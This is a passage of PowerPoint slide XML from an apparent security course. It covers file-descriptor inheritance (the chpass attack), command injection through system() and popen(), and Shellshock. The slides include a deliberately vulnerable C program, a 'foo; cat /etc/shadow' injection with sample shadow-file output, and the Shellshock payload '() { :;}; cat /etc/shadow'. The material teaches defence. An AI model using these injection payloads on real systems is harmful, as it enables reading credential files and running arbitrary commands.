        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>File Handler Reuse</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="519173" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SUID applications open files to perform their tasks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sometimes they fork external processes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If the close-on-exec flag is not set, the new process will inherit the open file descriptors of the original </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>program</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The open files might provide access to security-sensitive information</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16078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9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91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91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91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8" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>The chpass Attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="525319" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>chpass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>" command on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>OpenBSD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> systems allows unprivileged users to edit database information associated with their account</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>hpass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>creates a temporary copy of the password </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>database</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>spawning </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>an editor to display and modify user account </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>committing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the information into the temporary password file copy, which is then used to rebuild the password database </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Using an escape-to-shell feature of the vi editor it</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> was </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>possible to obtain a shell with an open file descriptor to the copy file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Arbitrary modifications </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>will </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>be merged in the original </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> file</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="73368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3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3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53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53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53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53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Make sure that no open file descriptors are inherited by forked programs</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="61232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6" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Command Injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="417797" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Applications invoke external commands to carry out specific tasks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>system</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(&lt;string&gt;) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>executes a command specified in</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> a string </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>by calling</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="838200" lvl="1" indent="-381000"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -c </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;string&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>popen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>() opens a process by creating a pipe, forking, and invoking the shell as in system(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>If the user can control the string passed to these functions, it can inject additional commands</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="565091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7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77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7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77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77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Example</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a: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int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>argc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char *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>[]) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pP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char </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>[1024];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>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snprintf(cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, 1024, "cat /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>var/log/%s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>", argv[1]);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  cmd[1023] = '\0';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pP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return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>system(cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>prog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> "foo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>; cat /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>/shadow"</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>/log/foo: file not found</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>root:$1$LtWqGee9$jLrc8CWVMx6oAA8WKzS5Z1:16661:0:99999:7:::</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>daemon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>:*:16652:0:99999:7:::</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8458200" y="5657850"/>
            <a:ext cx="685800" cy="342900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BD5F6748-727B-F942-A49F-96C7BB40957B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>65</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20911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Real Example: Shellshock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 September 2014, a new bug in how bash processes its environment variable was disclosed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The bash program can pass its environment to other instances of bash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>In addition to variables a bash instance can pass to another instance one or more function definitions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>This is accomplished by setting environment variables whose value start with ‘()’ followed by a function definition</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The function definition is the executed by the interpreter to create the function  	</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="177439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Real Example: Shellshock</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By appending commands to the function definition, it is possible to execute arbitrary code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Example: If a user has access to a limited-access </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> account he/she can break out of the restricted shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>When a command that is not the allowed one is requested, the original command is put in the variable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>$SSH_ORIGINAL_COMMAND</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>By passing as a command the string:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>() { :;}; cat /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>/shadow</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The command will be put in the environment variable and interpreted, resulting in the injected command executed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Also, CGI web applications pass arguments through environment variables</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Can execute arbitrary code through a web request!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10113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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Lessons Learned</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1007619" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Invoking commands with system() and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>popen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>() is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>dangerous</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Input from the user should always be sanitized </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="119696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7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76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dirty="0" smtClean="0"/>
              <a:t>Overflows/Overwrites</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="433155" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The lack of boundary checking is one of the most common mistakes in C/C++ applications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Overflows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>are one of the most popular type of attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Architecture/OS version dependant</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can be exploited both locally and remotely</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can modify both the data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the control flow of an application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Recent tools have made the process of exploiting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>overflows </a:t>
            </a:r>
            <a:r>
